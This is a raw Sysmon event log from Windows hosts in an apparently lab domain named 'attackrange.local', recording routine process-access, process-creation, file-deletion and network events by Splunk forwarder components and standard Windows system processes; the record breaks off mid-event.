10341000x800000000000000082237Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:32.000{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082236Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:32.000{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B374-615A-6601-00000000FD01}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082235Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:32.000{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B374-615A-6601-00000000FD01}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082234Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:32.001{2FDD8D40-B374-615A-6601-00000000FD01}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104387Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:33.812{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D6E5BFBD527C039FE1B7703D52CA628,SHA256=232A99B37492EE0157C0D990391A9FC50D458AD9BAD00A7956F45784D520BB55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082264Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:33.719{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC06E9FC247D41269036AF1E560535BD,SHA256=171B61DB56A14A6298FC61FF9398013558E625DACC7F22539D7B4CBC35AD4184,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082263Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:33.157{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B375-615A-6701-00000000FD01}516C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082262Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:33.157{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082261Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:33.157{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082260Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:33.157{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082259Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:33.157{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082258Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:33.157{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082257Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:33.157{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082256Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:33.157{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082255Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:33.157{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082254Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:33.157{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B375-615A-6701-00000000FD01}516C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082253Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:33.157{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082252Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:33.157{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B375-615A-6701-00000000FD01}516C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082251Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:33.157{2FDD8D40-B375-615A-6701-00000000FD01}516C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000104386Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:32.302{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49596-false10.0.1.12-8000- 23542300x8000000000000000104388Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:34.827{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC03D079517954728FEF45FFB515FFD6,SHA256=271F7ED41259A10006AB5C0DF60E4D4558F2EEDF9B7C162414D867146E3CB944,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082281Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:34.985{2FDD8D40-B376-615A-6801-00000000FD01}32003684C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000082280Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:32.757{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50086-false10.0.1.12-8000- 10341000x800000000000000082279Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:34.782{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B376-615A-6801-00000000FD01}3200C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082278Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:34.782{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082277Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:34.782{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082276Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:34.782{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082275Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:34.782{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082274Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:34.782{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082273Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 